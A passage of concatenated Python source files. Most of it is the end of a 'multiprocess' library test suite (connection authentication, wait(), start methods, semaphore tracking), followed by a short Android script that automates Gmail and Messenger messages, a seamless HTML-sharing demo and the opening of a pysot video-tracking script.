self.assertTrue(hasattr(mod, '__all__'), name) for attr in mod.__all__: self.assertTrue( hasattr(mod, attr), '%r does not have attribute %r' % (mod, attr) ) # # Quick test that logging works -- does not test logging output # class _TestLogging(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_enable_logging(self): logger = multiprocess.get_logger() logger.setLevel(util.SUBWARNING) self.assertTrue(logger is not None) logger.debug('this will not be printed') logger.info('nor will this') logger.setLevel(LOG_LEVEL) @classmethod def _test_level(cls, 
conn): logger = multiprocess.get_logger() conn.send(logger.getEffectiveLevel()) def test_level(self): LEVEL1 = 32 LEVEL2 = 37 logger = multiprocess.get_logger() root_logger = logging.getLogger() root_level = root_logger.level reader, writer = multiprocess.Pipe(duplex=False) logger.setLevel(LEVEL1) p = self.Process(target=self._test_level, args=(writer,)) p.start() self.assertEqual(LEVEL1, reader.recv()) p.join() logger.setLevel(logging.NOTSET) root_logger.setLevel(LEVEL2) p = self.Process(target=self._test_level, args=(writer,)) p.start() self.assertEqual(LEVEL2, reader.recv()) p.join() root_logger.setLevel(root_level) logger.setLevel(level=LOG_LEVEL) # class _TestLoggingProcessName(BaseTestCase): # # def handle(self, record): # assert record.processName == multiprocess.current_process().name # self.__handled = True # # def test_logging(self): # handler = logging.Handler() # handler.handle = self.handle # self.__handled = False # # Bypass getLogger() and side-effects # logger = logging.getLoggerClass()( # 'multiprocess.test.TestLoggingProcessName') # logger.addHandler(handler) # logger.propagate = False # # logger.warn('foo') # assert self.__handled # # Check that Process.join() retries if os.waitpid() fails with EINTR # class _TestPollEintr(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def _killer(cls, pid): time.sleep(0.1) os.kill(pid, signal.SIGUSR1) @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1') def test_poll_eintr(self): got_signal = [False] def record(*args): got_signal[0] = True pid = os.getpid() oldhandler = signal.signal(signal.SIGUSR1, record) try: killer = self.Process(target=self._killer, args=(pid,)) killer.start() try: p = self.Process(target=time.sleep, args=(2,)) p.start() p.join() finally: killer.join() self.assertTrue(got_signal[0]) self.assertEqual(p.exitcode, 0) finally: signal.signal(signal.SIGUSR1, oldhandler) # # Test to verify handle verification, see issue 3321 # class TestInvalidHandle(unittest.TestCase): 
    # (method of TestInvalidHandle, whose class header closes on the
    # previous chunk line) -- verify that Connection objects built from
    # bogus OS handles fail cleanly rather than crashing.
    @unittest.skipIf(WIN32, "skipped on Windows")
    def test_invalid_handles(self):
        # 44977608 is an arbitrary integer that is almost certainly not a
        # live file descriptor in this process.
        conn = multiprocess.connection.Connection(44977608)
        # check that poll() doesn't crash
        try:
            conn.poll()
        except (ValueError, OSError):
            pass
        finally:
            # Hack private attribute _handle to avoid printing an error
            # in conn.__del__
            conn._handle = None
        # A negative handle must be rejected outright at construction time.
        self.assertRaises((ValueError, OSError),
                          multiprocess.connection.Connection, -1)


class OtherTest(unittest.TestCase):
    """Tests for the HMAC challenge/response connection authentication."""
    # TODO: add more tests for deliver/answer challenge.

    def test_deliver_challenge_auth_failure(self):
        # A peer that answers the challenge with garbage bytes must make
        # deliver_challenge raise AuthenticationError.
        class _FakeConnection(object):
            def recv_bytes(self, size):
                return b'something bogus'
            def send_bytes(self, data):
                pass
        self.assertRaises(multiprocess.AuthenticationError,
                          multiprocess.connection.deliver_challenge,
                          _FakeConnection(), b'abc')

    def test_answer_challenge_auth_failure(self):
        # A server that sends a valid CHALLENGE header but then replies
        # with garbage (instead of WELCOME) must make answer_challenge
        # raise AuthenticationError.
        class _FakeConnection(object):
            def __init__(self):
                # count tracks which step of the handshake we are faking.
                self.count = 0
            def recv_bytes(self, size):
                self.count += 1
                if self.count == 1:
                    return multiprocess.connection.CHALLENGE
                elif self.count == 2:
                    return b'something bogus'
                return b''
            def send_bytes(self, data):
                pass
        self.assertRaises(multiprocess.AuthenticationError,
                          multiprocess.connection.answer_challenge,
                          _FakeConnection(), b'abc')

#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#

def initializer(ns):
    # Runs inside the child process; bumps the shared namespace counter so
    # the parent can observe that the initializer actually executed.
    ns.test += 1

class TestInitializers(unittest.TestCase):
    def setUp(self):
        # One manager + shared namespace per test; ns.test counts
        # initializer invocations.
        self.mgr = multiprocess.Manager()
        self.ns = self.mgr.Namespace()
        self.ns.test = 0

    def tearDown(self):
        self.mgr.shutdown()
        self.mgr.join()

    def test_manager_initializer(self):
        m = multiprocess.managers.SyncManager()
        # A non-callable initializer must be rejected up front.
        self.assertRaises(TypeError, m.start, 1)
        m.start(initializer, (self.ns,))
        self.assertEqual(self.ns.test, 1)
        m.shutdown()
        m.join()

    def test_pool_initializer(self):
        # Same contract for Pool: non-callable initializer -> TypeError.
        self.assertRaises(TypeError, multiprocess.Pool, initializer=1)
        p = multiprocess.Pool(1, initializer, (self.ns,))
        p.close()
        p.join()
        self.assertEqual(self.ns.test, 1)

#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies
os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior # def _this_sub_process(q): try: item = q.get(block=False) except pyqueue.Empty: pass def _test_process(): queue = multiprocess.Queue() subProc = multiprocess.Process(target=_this_sub_process, args=(queue,)) subProc.daemon = True subProc.start() subProc.join() def _afunc(x): return x*x def pool_in_process(): pool = multiprocess.Pool(processes=4) x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7]) pool.close() pool.join() class _file_like(object): def __init__(self, delegate): self._delegate = delegate self._pid = None @property def cache(self): pid = os.getpid() # There are no race conditions since fork keeps only the running thread if pid != self._pid: self._pid = pid self._cache = [] return self._cache def write(self, data): self.cache.append(data) def flush(self): self._delegate.write(''.join(self.cache)) self._cache = [] class TestStdinBadfiledescriptor(unittest.TestCase): def test_queue_in_process(self): proc = multiprocess.Process(target=_test_process) proc.start() proc.join() def test_pool_in_process(self): p = multiprocess.Process(target=pool_in_process) p.start() p.join() def test_flushing(self): sio = io.StringIO() flike = _file_like(sio) flike.write('foo') proc = multiprocess.Process(target=lambda: flike.flush()) flike.flush() assert sio.getvalue() == 'foo' class TestWait(unittest.TestCase): @classmethod def _child_test_wait(cls, w, slow): for i in range(10): if slow: time.sleep(random.random()*0.1) w.send((i, os.getpid())) w.close() def test_wait(self, slow=False): from multiprocess.connection import wait readers = [] procs = [] messages = [] for i in range(4): r, w = multiprocess.Pipe(duplex=False) p = multiprocess.Process(target=self._child_test_wait, args=(w, slow)) p.daemon = True p.start() w.close() readers.append(r) procs.append(p) self.addCleanup(p.join) while readers: for r in wait(readers): try: msg = r.recv() except EOFError: readers.remove(r) r.close() else: messages.append(msg) 
messages.sort() expected = sorted((i, p.pid) for i in range(10) for p in procs) self.assertEqual(messages, expected) @classmethod def _child_test_wait_socket(cls, address, slow): s = socket.socket() s.connect(address) for i in range(10): if slow: time.sleep(random.random()*0.1) s.sendall(('%s\n' % i).encode('ascii')) s.close() def test_wait_socket(self, slow=False): from multiprocess.connection import wait l = socket.socket() l.bind((support.HOST, 0)) l.listen() addr = l.getsockname() readers = [] procs = [] dic = {} for i in range(4): p = multiprocess.Process(target=self._child_test_wait_socket, args=(addr, slow)) p.daemon = True p.start() procs.append(p) self.addCleanup(p.join) for i in range(4): r, _ = l.accept() readers.append(r) dic[r] = [] l.close() while readers: for r in wait(readers): msg = r.recv(32) if not msg: readers.remove(r) r.close() else: dic[r].append(msg) expected = ''.join('%s\n' % i for i in range(10)).encode('ascii') for v in dic.values(): self.assertEqual(b''.join(v), expected) def test_wait_slow(self): self.test_wait(True) def test_wait_socket_slow(self): self.test_wait_socket(True) def test_wait_timeout(self): from multiprocess.connection import wait expected = 5 a, b = multiprocess.Pipe() start = time.time() res = wait([a, b], expected) delta = time.time() - start self.assertEqual(res, []) self.assertLess(delta, expected * 2) self.assertGreater(delta, expected * 0.5) b.send(None) start = time.time() res = wait([a, b], 20) delta = time.time() - start self.assertEqual(res, [a]) self.assertLess(delta, 0.4) @classmethod def signal_and_sleep(cls, sem, period): sem.release() time.sleep(period) def test_wait_integer(self): from multiprocess.connection import wait expected = 3 sorted_ = lambda l: sorted(l, key=lambda x: id(x)) sem = multiprocess.Semaphore(0) a, b = multiprocess.Pipe() p = multiprocess.Process(target=self.signal_and_sleep, args=(sem, expected)) p.start() self.assertIsInstance(p.sentinel, int) 
self.assertTrue(sem.acquire(timeout=20)) start = time.time() res = wait([a, p.sentinel, b], expected + 20) delta = time.time() - start self.assertEqual(res, [p.sentinel]) self.assertLess(delta, expected + 2) self.assertGreater(delta, expected - 2) a.send(None) start = time.time() res = wait([a, p.sentinel, b], 20) delta = time.time() - start self.assertEqual(sorted_(res), sorted_([p.sentinel, b])) self.assertLess(delta, 0.4) b.send(None) start = time.time() res = wait([a, p.sentinel, b], 20) delta = time.time() - start self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b])) self.assertLess(delta, 0.4) p.terminate() p.join() def test_neg_timeout(self): from multiprocess.connection import wait a, b = multiprocess.Pipe() t = time.time() res = wait([a], timeout=-1) t = time.time() - t self.assertEqual(res, []) self.assertLess(t, 1) a.close() b.close() # # Issue 14151: Test invalid family on invalid environment # class TestInvalidFamily(unittest.TestCase): @unittest.skipIf(WIN32, "skipped on Windows") def test_invalid_family(self): with self.assertRaises(ValueError): multiprocess.connection.Listener(r'\\.\test') @unittest.skipUnless(WIN32, "skipped on non-Windows platforms") def test_invalid_family_win32(self): with self.assertRaises(ValueError): multiprocess.connection.Listener('/var/test.pipe') # # Issue 12098: check sys.flags of child matches that for parent # class TestFlags(unittest.TestCase): @classmethod def run_in_grandchild(cls, conn): conn.send(tuple(sys.flags)) @classmethod def run_in_child(cls): import json r, w = multiprocess.Pipe(duplex=False) p = multiprocess.Process(target=cls.run_in_grandchild, args=(w,)) p.start() grandchild_flags = r.recv() p.join() r.close() w.close() flags = (tuple(sys.flags), grandchild_flags) print(json.dumps(flags)) def _test_flags(self): import json, subprocess # start child process using unusual flags prog = ('from multiprocess.tests import TestFlags; ' + 'TestFlags.run_in_child()') data = subprocess.check_output( 
[sys.executable, '-E', '-S', '-O', '-c', prog]) child_flags, grandchild_flags = json.loads(data.decode('ascii')) self.assertEqual(child_flags, grandchild_flags) # # Test interaction with socket timeouts - see Issue #6056 # class TestTimeouts(unittest.TestCase): @classmethod def _test_timeout(cls, child, address): time.sleep(1) child.send(123) child.close() conn = multiprocess.connection.Client(address) conn.send(456) conn.close() def test_timeout(self): old_timeout = socket.getdefaulttimeout() try: socket.setdefaulttimeout(0.1) parent, child = multiprocess.Pipe(duplex=True) l = multiprocess.connection.Listener(family='AF_INET') p = multiprocess.Process(target=self._test_timeout, args=(child, l.address)) p.start() child.close() self.assertEqual(parent.recv(), 123) parent.close() conn = l.accept() self.assertEqual(conn.recv(), 456) conn.close() l.close() p.join(10) finally: socket.setdefaulttimeout(old_timeout) # # Test what happens with no "if __name__ == '__main__'" # class TestNoForkBomb(unittest.TestCase): def test_noforkbomb(self): sm = multiprocess.get_start_method() name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py') if sm != 'fork': rc, out, err = support.script_helper.assert_python_failure(name, sm) self.assertEqual(out, b'') self.assertIn(b'RuntimeError', err) else: rc, out, err = support.script_helper.assert_python_ok(name, sm) self.assertEqual(out.rstrip(), b'123') self.assertEqual(err, b'') # # Issue #17555: ForkAwareThreadLock # class TestForkAwareThreadLock(unittest.TestCase): # We recursively start processes. Issue #17555 meant that the # after fork registry would get duplicate entries for the same # lock. The size of the registry at generation n was ~2**n. 
@classmethod def child(cls, n, conn): if n > 1: p = multiprocess.Process(target=cls.child, args=(n-1, conn)) p.start() conn.close() p.join(timeout=5) else: conn.send(len(util._afterfork_registry)) conn.close() def test_lock(self): r, w = multiprocess.Pipe(False) l = util.ForkAwareThreadLock() old_size = len(util._afterfork_registry) p = multiprocess.Process(target=self.child, args=(5, w)) p.start() w.close() new_size = r.recv() p.join(timeout=5) self.assertLessEqual(new_size, old_size) # # Check that non-forked child processes do not inherit unneeded fds/handles # class TestCloseFds(unittest.TestCase): def get_high_socket_fd(self): if WIN32: # The child process will not have any socket handles, so # calling socket.fromfd() should produce WSAENOTSOCK even # if there is a handle of the same number. return socket.socket().detach() else: # We want to produce a socket with an fd high enough that a # freshly created child process will not have any fds as high. fd = socket.socket().detach() to_close = [] while fd < 50: to_close.append(fd) fd = os.dup(fd) for x in to_close: os.close(x) return fd def close(self, fd): if WIN32: socket.socket(fileno=fd).close() else: os.close(fd) @classmethod def _test_closefds(cls, conn, fd): try: s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM) except Exception as e: conn.send(e) else: s.close() conn.send(None) def test_closefd(self): if not HAS_REDUCTION: raise unittest.SkipTest('requires fd pickling') reader, writer = multiprocess.Pipe() fd = self.get_high_socket_fd() try: p = multiprocess.Process(target=self._test_closefds, args=(writer, fd)) p.start() writer.close() e = reader.recv() p.join(timeout=5) finally: self.close(fd) writer.close() reader.close() if multiprocess.get_start_method() == 'fork': self.assertIs(e, None) else: WSAENOTSOCK = 10038 self.assertIsInstance(e, OSError) self.assertTrue(e.errno == errno.EBADF or e.winerror == WSAENOTSOCK, e) # # Issue #17097: EINTR should be ignored by recv(), send(), accept() etc # 
class TestIgnoreEINTR(unittest.TestCase): # Sending CONN_MAX_SIZE bytes into a multiprocess pipe must block CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE) @classmethod def _test_ignore(cls, conn): def handler(signum, frame): pass signal.signal(signal.SIGUSR1, handler) conn.send('ready') x = conn.recv() conn.send(x) conn.send_bytes(b'x' * cls.CONN_MAX_SIZE) @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1') def test_ignore(self): conn, child_conn = multiprocess.Pipe() try: p = multiprocess.Process(target=self._test_ignore, args=(child_conn,)) p.daemon = True p.start() child_conn.close() self.assertEqual(conn.recv(), 'ready') time.sleep(0.1) os.kill(p.pid, signal.SIGUSR1) time.sleep(0.1) conn.send(1234) self.assertEqual(conn.recv(), 1234) time.sleep(0.1) os.kill(p.pid, signal.SIGUSR1) self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE) time.sleep(0.1) p.join() finally: conn.close() @classmethod def _test_ignore_listener(cls, conn): def handler(signum, frame): pass signal.signal(signal.SIGUSR1, handler) with multiprocess.connection.Listener() as l: conn.send(l.address) a = l.accept() a.send('welcome') @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1') def test_ignore_listener(self): conn, child_conn = multiprocess.Pipe() try: p = multiprocess.Process(target=self._test_ignore_listener, args=(child_conn,)) p.daemon = True p.start() child_conn.close() address = conn.recv() time.sleep(0.1) os.kill(p.pid, signal.SIGUSR1) time.sleep(0.1) client = multiprocess.connection.Client(address) self.assertEqual(client.recv(), 'welcome') p.join() finally: conn.close() class TestStartMethod(unittest.TestCase): @classmethod def _check_context(cls, conn): conn.send(multiprocess.get_start_method()) def check_context(self, ctx): r, w = ctx.Pipe(duplex=False) p = ctx.Process(target=self._check_context, args=(w,)) p.start() w.close() child_method = r.recv() r.close() p.join() self.assertEqual(child_method, 
ctx.get_start_method()) def _test_context(self): for method in ('fork', 'spawn', 'forkserver'): try: ctx = multiprocess.get_context(method) except ValueError: continue self.assertEqual(ctx.get_start_method(), method) self.assertIs(ctx.get_context(), ctx) self.assertRaises(ValueError, ctx.set_start_method, 'spawn') self.assertRaises(ValueError, ctx.set_start_method, None) self.check_context(ctx) def _test_set_get(self): multiprocess.set_forkserver_preload(PRELOAD) count = 0 old_method = multiprocess.get_start_method() try: for method in ('fork', 'spawn', 'forkserver'): try: multiprocess.set_start_method(method, force=True) except ValueError: continue self.assertEqual(multiprocess.get_start_method(), method) ctx = multiprocess.get_context() self.assertEqual(ctx.get_start_method(), method) self.assertTrue(type(ctx).__name__.lower().startswith(method)) self.assertTrue( ctx.Process.__name__.lower().startswith(method)) self.check_context(multiprocess) count += 1 finally: multiprocess.set_start_method(old_method, force=True) self.assertGreaterEqual(count, 1) def test_get_all(self): methods = multiprocess.get_all_start_methods() if sys.platform == 'win32': self.assertEqual(methods, ['spawn']) else: self.assertTrue(methods == ['fork', 'spawn'] or methods == ['fork', 'spawn', 'forkserver']) def test_preload_resources(self): if multiprocess.get_start_method() != 'forkserver': self.skipTest("test only relevant for 'forkserver' method") name = os.path.join(os.path.dirname(__file__), 'mp_preload.py') rc, out, err = support.script_helper.assert_python_ok(name) out = out.decode() err = err.decode() if out.rstrip() != 'ok' or err != '': print(out) print(err) self.fail("failed spawning forkserver or grandchild") @unittest.skipIf(sys.platform == "win32", "test semantics don't make sense on Windows") class TestSemaphoreTracker(unittest.TestCase): def _test_semaphore_tracker(self): # # Check that killing process does not leak named semaphores # import subprocess cmd = '''if 1: import 
multiprocess as mp, time, os mp.set_start_method("spawn") lock1 = mp.Lock() lock2 = mp.Lock() os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n") os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n") time.sleep(10) ''' r, w = os.pipe() p = subprocess.Popen([sys.executable, '-E', '-c', cmd % (w, w)], pass_fds=[w], stderr=subprocess.PIPE) os.close(w) with open(r, 'rb', closefd=True) as f: name1 = f.readline().rstrip().decode('ascii') name2 = f.readline().rstrip().decode('ascii') _multiprocessing.sem_unlink(name1) p.terminate() p.wait() time.sleep(2.0) with self.assertRaises(OSError) as ctx: _multiprocessing.sem_unlink(name2) # docs say it should be ENOENT, but OSX seems to give EINVAL self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL)) err = p.stderr.read().decode('utf-8') p.stderr.close() expected = 'semaphore_tracker: There appear to be 2 leaked semaphores' self.assertRegex(err, expected) self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1) def check_semaphore_tracker_death(self, signum, should_die): # bpo-31310: if the semaphore tracker process has died, it should # be restarted implicitly. from multiprocess.semaphore_tracker import _semaphore_tracker _semaphore_tracker.ensure_running() pid = _semaphore_tracker._pid os.kill(pid, signum) time.sleep(1.0) # give it time to die ctx = multiprocess.get_context("spawn") with contextlib.ExitStack() as stack: if should_die: stack.enter_context(self.assertWarnsRegex( UserWarning, "semaphore_tracker: process died")) sem = ctx.Semaphore() sem.acquire() sem.release() wr = weakref.ref(sem) # ensure `sem` gets collected, which triggers communication with # the semaphore tracker del sem gc.collect() self.assertIsNone(wr()) def test_semaphore_tracker_sigint(self): # Catchable signal (ignored by semaphore tracker) self.check_semaphore_tracker_death(signal.SIGINT, False) def test_semaphore_tracker_sigkill(self): # Uncatchable signal. 
self.check_semaphore_tracker_death(signal.SIGKILL, True) class TestSimpleQueue(unittest.TestCase): @classmethod def _test_empty(cls, queue, child_can_start, parent_can_continue): child_can_start.wait() # issue 30301, could fail under spawn and forkserver try: queue.put(queue.empty()) queue.put(queue.empty()) finally: parent_can_continue.set() def test_empty(self): queue = multiprocess.SimpleQueue() child_can_start = multiprocess.Event() parent_can_continue = multiprocess.Event() proc = multiprocess.Process( target=self._test_empty, args=(queue, child_can_start, parent_can_continue) ) proc.daemon = True proc.start() self.assertTrue(queue.empty()) child_can_start.set() parent_can_continue.wait() self.assertFalse(queue.empty()) self.assertEqual(queue.get(), True) self.assertEqual(queue.get(), False) self.assertTrue(queue.empty()) proc.join() # # Mixins # class BaseMixin(object): @classmethod def setUpClass(cls): cls.dangling = (multiprocess.process._dangling.copy(), threading._dangling.copy()) @classmethod def tearDownClass(cls): # bpo-26762: Some multiprocess objects like Pool create reference # cycles. Trigger a garbage collection to break these cycles. 
support.gc_collect() processes = set(multiprocess.process._dangling) - set(cls.dangling[0]) if processes: print('Warning -- Dangling processes: %s' % processes, file=sys.stderr) processes = None threads = set(threading._dangling) - set(cls.dangling[1]) if threads: print('Warning -- Dangling threads: %s' % threads, file=sys.stderr) threads = None class ProcessesMixin(BaseMixin): TYPE = 'processes' Process = multiprocess.Process connection = multiprocess.connection current_process = staticmethod(multiprocess.current_process) active_children = staticmethod(multiprocess.active_children) Pool = staticmethod(multiprocess.Pool) Pipe = staticmethod(multiprocess.Pipe) Queue = staticmethod(multiprocess.Queue) JoinableQueue = staticmethod(multiprocess.JoinableQueue) Lock = staticmethod(multiprocess.Lock) RLock = staticmethod(multiprocess.RLock) Semaphore = staticmethod(multiprocess.Semaphore) BoundedSemaphore = staticmethod(multiprocess.BoundedSemaphore) Condition = staticmethod(multiprocess.Condition) Event = staticmethod(multiprocess.Event) Barrier = staticmethod(multiprocess.Barrier) Value = staticmethod(multiprocess.Value) Array = staticmethod(multiprocess.Array) RawValue = staticmethod(multiprocess.RawValue) RawArray = staticmethod(multiprocess.RawArray) class ManagerMixin(BaseMixin): TYPE = 'manager' Process = multiprocess.Process Queue = property(operator.attrgetter('manager.Queue')) JoinableQueue = property(operator.attrgetter('manager.JoinableQueue')) Lock = property(operator.attrgetter('manager.Lock')) RLock = property(operator.attrgetter('manager.RLock')) Semaphore = property(operator.attrgetter('manager.Semaphore')) BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore')) Condition = property(operator.attrgetter('manager.Condition')) Event = property(operator.attrgetter('manager.Event')) Barrier = property(operator.attrgetter('manager.Barrier')) Value = property(operator.attrgetter('manager.Value')) Array = 
property(operator.attrgetter('manager.Array')) list = property(operator.attrgetter('manager.list')) dict = property(operator.attrgetter('manager.dict')) Namespace = property(operator.attrgetter('manager.Namespace')) @classmethod def Pool(cls, *args, **kwds): return cls.manager.Pool(*args, **kwds) @classmethod def setUpClass(cls): super().setUpClass() cls.manager = multiprocess.Manager() @classmethod def tearDownClass(cls): # only the manager process should be returned by active_children() # but this can take a bit on slow machines, so wait a few seconds # if there are other children too (see #17395) start_time = time.monotonic() t = 0.01 while len(multiprocess.active_children()) > 1: time.sleep(t) t *= 2 dt = time.monotonic() - start_time if dt >= 5.0: print("Warning -- multiprocess.Manager still has %s active " "children after %s seconds" % (multiprocess.active_children(), dt), file=sys.stderr) break gc.collect() # do garbage collection if cls.manager._number_of_objects() != 0: # This is not really an error since some tests do not # ensure that all processes which hold a reference to a # managed object have been joined. 
print('Warning -- Shared objects which still exist at manager ' 'shutdown:') print(cls.manager._debug_info()) cls.manager.shutdown() cls.manager.join() cls.manager = None super().tearDownClass() class ThreadsMixin(BaseMixin): TYPE = 'threads' Process = multiprocess.dummy.Process connection = multiprocess.dummy.connection current_process = staticmethod(multiprocess.dummy.current_process) active_children = staticmethod(multiprocess.dummy.active_children) Pool = staticmethod(multiprocess.dummy.Pool) Pipe = staticmethod(multiprocess.dummy.Pipe) Queue = staticmethod(multiprocess.dummy.Queue) JoinableQueue = staticmethod(multiprocess.dummy.JoinableQueue) Lock = staticmethod(multiprocess.dummy.Lock) RLock = staticmethod(multiprocess.dummy.RLock) Semaphore = staticmethod(multiprocess.dummy.Semaphore) BoundedSemaphore = staticmethod(multiprocess.dummy.BoundedSemaphore) Condition = staticmethod(multiprocess.dummy.Condition) Event = staticmethod(multiprocess.dummy.Event) Barrier = staticmethod(multiprocess.dummy.Barrier) Value = staticmethod(multiprocess.dummy.Value) Array = staticmethod(multiprocess.dummy.Array) # # Functions used to create test cases from the base ones in this module # def install_tests_in_module_dict(remote_globs, start_method): __module__ = remote_globs['__name__'] local_globs = globals() ALL_TYPES = {'processes', 'threads', 'manager'} for name, base in local_globs.items(): if not isinstance(base, type): continue if issubclass(base, BaseTestCase): if base is BaseTestCase: continue assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES for type_ in base.ALLOWED_TYPES: newname = 'With' + type_.capitalize() + name[1:] Mixin = local_globs[type_.capitalize() + 'Mixin'] class Temp(base, Mixin, unittest.TestCase): pass Temp.__name__ = Temp.__qualname__ = newname Temp.__module__ = __module__ remote_globs[newname] = Temp elif issubclass(base, unittest.TestCase): class Temp(base, object): pass Temp.__name__ = Temp.__qualname__ = name Temp.__module__ = 
__module__ remote_globs[name] = Temp dangling = [None, None] old_start_method = [None] def setUpModule(): multiprocess.set_forkserver_preload(PRELOAD) multiprocess.process._cleanup() dangling[0] = multiprocess.process._dangling.copy() dangling[1] = threading._dangling.copy() old_start_method[0] = multiprocess.get_start_method(allow_none=True) try: multiprocess.set_start_method(start_method, force=True) except ValueError: raise unittest.SkipTest(start_method + ' start method not supported') if sys.platform.startswith("linux"): try: lock = multiprocess.RLock() except OSError: raise unittest.SkipTest("OSError raises on RLock creation, " "see issue 3111!") check_enough_semaphores() util.get_temp_dir() # creates temp directory multiprocess.get_logger().setLevel(LOG_LEVEL) def tearDownModule(): need_sleep = False # bpo-26762: Some multiprocess objects like Pool create reference # cycles. Trigger a garbage collection to break these cycles. support.gc_collect() multiprocess.set_start_method(old_start_method[0], force=True) # pause a bit so we don't get warning about dangling threads/processes processes = set(multiprocess.process._dangling) - set(dangling[0]) if processes: need_sleep = True print('Warning -- Dangling processes: %s' % processes, file=sys.stderr) processes = None threads = set(threading._dangling) - set(dangling[1]) if threads: need_sleep = True print('Warning -- Dangling threads: %s' % threads, file=sys.stderr) threads = None # Sleep 500 ms to give time to child processes to complete. if need_sleep: time.sleep(0.5) multiprocess.process._cleanup() support.gc_collect() remote_globs['setUpModule'] = setUpModule remote_globs['tearDownModule'] = tearDownModule
action.py
from threading import Thread

from uiautomator import device as d

from ctx.generators.util import Adb


class Actuator:
    """Drives the attached Android device (uiautomator + adb) to carry out
    the actions listed in a recipe dict."""

    def execute_in_background(self, recipe):
        """Run :meth:`execute` on a worker thread so the caller returns at once."""
        worker = Thread(target=self.execute, args=(recipe,))
        worker.start()

    def execute(self, recipe):
        """Dispatch every action in ``recipe['action']`` to its handler, in order.

        Actions with an unrecognised ``id`` are silently skipped, matching
        the behavior of a fall-through if/elif chain.
        """
        handlers = {
            'Facebook': self.do_facebook,
            'Calendar': self.do_agenda,
            'Email': self.do_email,
        }
        for action in recipe['action']:
            handler = handlers.get(action['id'])
            if handler is not None:
                handler(action, recipe['variables'])

    def do_email(self, action, variables):
        """Compose and send a Gmail message on the device.

        ``action['value']`` is the recipient; subject/body come from the
        ``$titulo`` / ``$mensagem`` recipe variables.
        """
        recipient = action['value']
        subject = self.get_var("$titulo", variables)
        body = self.get_var("$mensagem", variables)
        d.screen.on()
        d.press.home()
        # Jump straight into Gmail's compose activity.
        Adb.start("com.google.android.gm/com.google.android.gm.ComposeActivityGmail")
        d(resourceId="com.google.android.gm:id/to").click()
        Adb.write(recipient)
        d.press.enter()
        d(resourceId="com.google.android.gm:id/subject").click()
        Adb.write(subject)
        d(resourceId="com.google.android.gm:id/body").click()
        Adb.write(body)
        d(resourceId="com.google.android.gm:id/send").click()

    def do_agenda(self, action, variables):
        """Calendar action — not implemented yet."""
        pass

    def do_facebook(self, action, variables):
        """Send a Facebook Messenger message to the contact named in
        ``action['value']``; the text comes from the ``$mensagem`` variable."""
        contact = action["value"]
        message = self.get_var("$mensagem", variables)
        d.screen.on()
        d.press.home()
        # Launch Messenger, search the contact, open the first result.
        Adb.start("com.facebook.orca/.auth.StartScreenActivity")
        d(resourceId="com.facebook.orca:id/action_search").click()
        Adb.write(contact)
        d(className="android.widget.ListView").child(index=1).click()
        d(resourceId="com.facebook.orca:id/edit_text").click()
        Adb.write(message)
        d(description="Enviar").click()

    @staticmethod
    def get_var(var_name, variables):
        """Return the ``value`` of the variable dict whose ``name`` matches
        ``var_name``; raises StopIteration when no variable matches."""
        return next(var['value'] for var in variables if var['name'] == var_name)
test-html.py
# Demo script: expose an HTML cell through seamless' built-in share server
# and fetch it back over HTTP with requests.
from seamless.highlevel import Context

# Build a context holding one text/html cell, mirror it to disk and share it.
ctx = Context()
ctx.a = "<b>Hello world!</b>"
ctx.a.celltype = "text"
ctx.a.mimetype = "html"
ctx.a.mount("/tmp/a.html")
ctx.a.share()
ctx.translate()

import asyncio
import requests
loop = asyncio.get_event_loop()
# Let the event loop run briefly so the share server can come up.
loop.run_until_complete(asyncio.sleep(1))

def thread(func, *args, **kwargs):
    """Run func(*args, **kwargs) on a worker thread while keeping the asyncio
    event loop ticking, and return func's result.

    The blocking HTTP request must not starve the loop — the shared cell is
    served from this same loop — so short join() waits are interleaved with
    short loop iterations until the worker finishes.
    """
    from threading import Thread
    from queue import Queue
    def func2(func, q, args, kwargs):
        # Worker body: run the function, hand the result back via the queue.
        result = func(*args, **kwargs)
        q.put(result)
    q = Queue()
    t = Thread(target=func2, args=(func, q, args, kwargs))
    t.start()
    while t.is_alive():
        t.join(0.05)
        loop.run_until_complete(asyncio.sleep(0.01))
    return q.get()

# Fetch the shared cell over HTTP and print the HTML body.
r = thread(requests.get, 'http://localhost:5813/ctx/a')
print(r.text)
offline_tracking.py
import mmcv
import numpy as np
import os.path as osp
import cv2
import matplotlib.pyplot as plt
import random
import argparse
import cv2
import torch
from torch.utils.data import Dataset
import numpy as np
# from tensorboardX import SummaryWritter
from pysot.core.config import cfg
from pysot.models.model_builder import ModelBuilder
from pysot.tracker.tracker_builder import build_tracker
import datetime
import time
import pickle
from multiprocessing import Pool
from torch import multiprocessing

# AVA-style clip timing constants (frame indices derive from these below).
_TIMESTAMP_BIAS = 600
_TIMESTAMP_START = 840  # 60*14min
_TIMESTAMP_END = 1860  # 60*31min
_FPS = 30

torch.set_num_threads(0)
parser = argparse.ArgumentParser(description='tracking demo')
parser.add_argument('--config', type=str, help='config file')
parser.add_argument('--snapshot', type=str, help='model name')
parser.add_argument('--video_name', default='', type=str,
                    help='videos or image files')
args = parser.parse_args()
cfg.merge_from_file(args.config)
cfg.CUDA = True
# Fix every RNG seed so shuffling/tracking runs are reproducible.
random.seed(0)
np.random.seed(0)
torch.manual_seed(0)
torch.cuda.manual_seed(0)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False


class Tracking_Proposal(object):
